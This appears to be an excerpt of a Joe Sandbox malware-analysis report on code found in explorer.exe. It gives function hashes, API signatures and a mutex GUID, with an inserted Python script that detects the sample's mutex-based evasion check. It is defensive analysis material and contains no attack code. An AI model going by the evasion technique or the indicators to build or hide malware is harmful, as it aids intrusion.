                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: 2279b9e329606f482461459331447446910ba0a7178c6b7be947a094aef3e10f
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: 2279b9e329606f482461459331447446910ba0a7178c6b7be947a094aef3e10f
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: cd7f7dacfb38960633c265f37f2beb7289591d5bb6379b87ea7dbaf7eb1417f9
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: cd7f7dacfb38960633c265f37f2beb7289591d5bb6379b87ea7dbaf7eb1417f9
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: f33f5098479b61cb8784f9bdc42afecc69a11538bc06af07a78670a9932cc185
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: f33f5098479b61cb8784f9bdc42afecc69a11538bc06af07a78670a9932cc185
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: d13ebd1533689c61dbedd7e5c398c8caf9c83e98fba6a0ef91f1596ae0a7184f
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: d13ebd1533689c61dbedd7e5c398c8caf9c83e98fba6a0ef91f1596ae0a7184f
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: 154d7befebbb67ca448b3011b7ee005e36315c4a0744a47ed84eebfe96a10e49
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: 154d7befebbb67ca448b3011b7ee005e36315c4a0744a47ed84eebfe96a10e49
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Uninitialize$CreateFromGuidInitializeString
                          • String ID:
                          • API String ID: 46189592-0
                          • Opcode ID: 98d1923c9e600ed36ae5589ba33196ce763fd58fc06dba7b5e299eff5153a42d
                          • Instruction ID: 45072c70474bd4514dad97535d99c68b30ffe0a16773403d8603d6cd2d72e84f
                          • Opcode Fuzzy Hash: 98d1923c9e600ed36ae5589ba33196ce763fd58fc06dba7b5e299eff5153a42d
                          • Instruction Fuzzy Hash: 03E06D323149A582EB1C7F64E8083DA2774F750B49F840029EA8AC16B5DF6DC14AC700
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$MutexRelease
                          • String ID:
                          • API String ID: 2279609368-0
                          • Opcode ID: 243a2039e09a370efbe64ca8e91fb5a861a196b6e0ad1bf0f32ac2e1f9b342c3
                          • Instruction ID: 4f7417b323fb9d49e3c84fce8d814c7a7b06030975a7afdb36340af533c5a9ea
                          • Opcode Fuzzy Hash: 243a2039e09a370efbe64ca8e91fb5a861a196b6e0ad1bf0f32ac2e1f9b342c3
                          • Instruction Fuzzy Hash: 0AF0A531115E4082E75CAB11F8983E963B1FBC4B69F901039E78B82A74CF7DC88AC740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_fltout2_invalid_parameter_noinfo
                          • String ID: -
                          • API String ID: 485257318-2547889144
                          • Opcode ID: eb0da219b1e6c698879588daba050085f6bb106e72c1d381b0551375f9195ab6
                          • Instruction ID: 2c6b256f8a53366a651994b035cf97602cae202937ad0454c5ca31646ba7becf
                          • Opcode Fuzzy Hash: eb0da219b1e6c698879588daba050085f6bb106e72c1d381b0551375f9195ab6
                          • Instruction Fuzzy Hash: 0431F522308A8185DA299B65B85079ABB61FBB5FE8F04421ADF9807F98DF28C445CB10
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo
                          • String ID: 1
                          • API String ID: 2819658684-2212294583
                          • Opcode ID: ad9f0758fff27885306979df86806ac888a182690923f3c3b573b2da9f238c34
                          • Instruction ID: 40712d58433c0931927b0e3444af8e4871c03b2d21276b8f946fef61e72ba958
                          • Opcode Fuzzy Hash: ad9f0758fff27885306979df86806ac888a182690923f3c3b573b2da9f238c34
                          • Instruction Fuzzy Hash: C711066221D6E0D6EB1F8F38D57036C6E559B75F88F8AC069C74607B1AD72EC940C722
                          APIs
                          Strings
                          • {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}, xrefs: 0119EADE
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$CloseHandleMutexOpen
                          • String ID: {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}
                          • API String ID: 2551712853-555727378
                          • Opcode ID: 25bec7e92827d0297fd61afa6c2a10886451f66215c2a3fb739f2a55cdae6f8b
                          • Instruction ID: af5f73ccdd18a82325b23b8a7fc1152114e5c50d3b617ca4a5305255282d8f78
                          • Opcode Fuzzy Hash: 25bec7e92827d0297fd61afa6c2a10886451f66215c2a3fb739f2a55cdae6f8b
                          • Instruction Fuzzy Hash: 43E0463120AF48C2E70CEB16E8583EA63A2F788358F044029E39783AA4DF3CC44AC751
                          APIs
                          Strings
                          • {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}, xrefs: 0119E9E4
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleMutexOpenSleep
                          • String ID: {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}
                          • API String ID: 2969294566-555727378
                          • Opcode ID: 441557c633a345505624ff61e171cf7fb03210bb1cc255660fe9b56885f110e2
                          • Instruction ID: 10c77c648196905f4cfd424be69367905c96ed5e51dd1cf040f88655cb73aee7
                          • Opcode Fuzzy Hash: 441557c633a345505624ff61e171cf7fb03210bb1cc255660fe9b56885f110e2
                          • Instruction Fuzzy Hash: 07E04F30105A5083E71CEB14F8083EA62B1F785345F100039E35793664DF3EC885C702
                          APIs
                          • GetModuleHandleW.KERNEL32(?,?,000000FF,011BE619,?,?,00000028,011BC7F1,?,?,?,011C06FC,?,?,00000000,011C0C0D), ref: 011BE5DF
                          • GetProcAddress.KERNEL32(?,?,000000FF,011BE619,?,?,00000028,011BC7F1,?,?,?,011C06FC,?,?,00000000,011C0C0D), ref: 011BE5F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 1646373207-1276376045
                          • Opcode ID: 67fd304b8d5c5dfc8f69313dee537c28d2a599d129ff7dd232d388c1c2320c93
                          • Instruction ID: 64aa0fe3a5ba5bd3c435c3cdb0ec9f22977f2b8f015e787d03a23880519b9b27
                          • Opcode Fuzzy Hash: 67fd304b8d5c5dfc8f69313dee537c28d2a599d129ff7dd232d388c1c2320c93
                          • Instruction Fuzzy Hash: 9FD05B307C370042FF1D5B94A8C83E42BA09B4C702F481428C61E06351DF7CC5D9C380
                          APIs
                          Strings
                          • {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}, xrefs: 0119EBE6
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$CloseHandleMutexOpen
                          • String ID: {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}
                          • API String ID: 2551712853-555727378
                          • Opcode ID: 0536936bd104f7e511559acd778527aa54bdbdc1e5228892e3991640a40c1caf
                          • Instruction ID: 26ee8cce5bd2b2f8c63fba57fda5a20e1c87af02ba5dc068a3400b8ffa9c885a
                          • Opcode Fuzzy Hash: 0536936bd104f7e511559acd778527aa54bdbdc1e5228892e3991640a40c1caf
                          • Instruction Fuzzy Hash: 1CE0463110AA8081E76CFB24F8083EA72A1F788305F004839D3DBD2AA4CF38C089C712
                          APIs
                          Strings
                          • {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}, xrefs: 0119EC73
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$CloseHandleMutexOpen
                          • String ID: {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}
                          • API String ID: 2551712853-555727378
                          • Opcode ID: 56660e23fab4dcdc456bdd07bfbcca192f9671feb55bbfd65129424a54c7b959
                          • Instruction ID: bb92daf6222378ec754b79c46ac8ae7e2ccbd8ff05cbd7f68278dec3d8f4a68e
                          • Opcode Fuzzy Hash: 56660e23fab4dcdc456bdd07bfbcca192f9671feb55bbfd65129424a54c7b959
                          • Instruction Fuzzy Hash: B4E04F30105AC4C1E77CEB15F8883EA62A1F784704F448429D3DBD66A8CF38C489DB41
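The two entries above are the functions behind the report's "evasive API chain" verdict: each references OpenMutex, Sleep and CloseHandle and the hard-coded name {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}, the classic "is another instance already running" check that a sandbox can trip by pre-creating the mutex. The following script is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the "Similarity" entries in this layout, flags functions whose API set contains the mutex-check chain, and pulls the GUID out of the String ID as an indicator. The rule it uses for API ID values is inferred from this listing and is an assumption: each `$`-separated tier holds the alphabetically sorted CamelCase words of the APIs it groups, so OpenMutex appears as MutexOpen and LocalAlloc as AllocLocal. Because an API ID records which APIs a function references and not their order, a match is a lead to confirm in the dump (the Strings section above gives the xref at 0119EC73), not proof of the chain by itself.

```python
"""Flag evasive mutex-check API chains in Joe Sandbox IDA-plugin 'Similarity' entries.

Added example, not code from the Joe Sandbox report. The word-splitting rule for
'API ID' values is inferred from the report's own listing (an assumption).
"""
import re
from dataclasses import dataclass, field

# Constructed sample: a few 'Similarity' entries copied in the report's layout.
SAMPLE_REPORT = """\
• API ID: Sleep$CloseHandleMutexOpen
• String ID: {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}
• API String ID: 2551712853-555727378
• Opcode ID: 0536936bd104f7e511559acd778527aa54bdbdc1e5228892e3991640a40c1caf
• API ID: lstrlen$AllocLocal
• String ID:
• API String ID: 2140729754-0
• Opcode ID: bd9faf728ad4c72ec4bacf9dd23215c0e2a2fa92f6ce5d9ceb5c19a18cda9d0b
• API ID: ObjectSingleWait$closesocketshutdown$CloseHandle$EnumEventsFreeLocalNetwork
• String ID:
• API String ID: 3044467104-0
• Opcode ID: 81ccbe93b8fc7bd16980f115d78441d3d5af4185a1ed9f96ba58278dc336bfb5
"""

GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
# CamelCase words ("CloseHandle" -> Close, Handle) or an all-lowercase token ("lstrlen").
WORD_RE = re.compile(r"[A-Z][a-z0-9]*|[a-z0-9]+")
ENTRY_RE = re.compile(r"\s*•\s*(API ID|String ID|Opcode ID):\s*(.*)$")

# The chain the report's signature refers to: open a named mutex, sleep, close it.
MUTEX_CHECK = {"Open", "Mutex", "Sleep"}


@dataclass
class FunctionEntry:
    api_id: str
    string_id: str
    opcode_id: str
    words: set = field(default_factory=set)


def split_words(api_id):
    """Return the set of word tokens in an API ID, ignoring the '$' tier separators."""
    words = set()
    for tier in api_id.split("$"):
        words.update(WORD_RE.findall(tier))
    return words


def parse_entries(text):
    """Group consecutive API ID / String ID / Opcode ID lines into FunctionEntry objects."""
    entries, current = [], {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "API ID" and current:      # a new API ID starts the next function
            entries.append(_build(current))
            current = {}
        current[key] = value
    if current:
        entries.append(_build(current))
    return entries


def _build(fields):
    api_id = fields.get("API ID", "")
    return FunctionEntry(api_id, fields.get("String ID", ""),
                         fields.get("Opcode ID", ""), split_words(api_id))


def find_mutex_checks(text):
    """Return one dict per function whose API set contains the OpenMutex/Sleep chain."""
    hits = []
    for entry in parse_entries(text):
        if MUTEX_CHECK <= entry.words:
            guid = GUID_RE.search(entry.string_id)
            hits.append({"opcode_id": entry.opcode_id,
                         "mutex_name": guid.group(0) if guid else None})
    return hits


if __name__ == "__main__":
    for hit in find_mutex_checks(SAMPLE_REPORT):
        print(f"mutex check in function {hit['opcode_id'][:16]}..., name {hit['mutex_name']}")
```

The extracted GUID is the useful artifact: the same name should appear in the other mutex entry on this page, and pre-creating a mutex with that name in a sandbox is the usual way to test whether the sample really bails out when it "sees itself".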
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$AllocLocal
                          • String ID:
                          • API String ID: 2140729754-0
                          • Opcode ID: bd9faf728ad4c72ec4bacf9dd23215c0e2a2fa92f6ce5d9ceb5c19a18cda9d0b
                          • Instruction ID: 87bd3bea0a6debbe09f545340596b108f8038c551ae1a00238fa596b533cb465
                          • Opcode Fuzzy Hash: bd9faf728ad4c72ec4bacf9dd23215c0e2a2fa92f6ce5d9ceb5c19a18cda9d0b
                          • Instruction Fuzzy Hash: 6181CA76619A84CACB68CB29E48436ABBA0F3C8B95F504125E7DE83B58DF7DC545CF00
                          APIs
                          Memory Dump Source
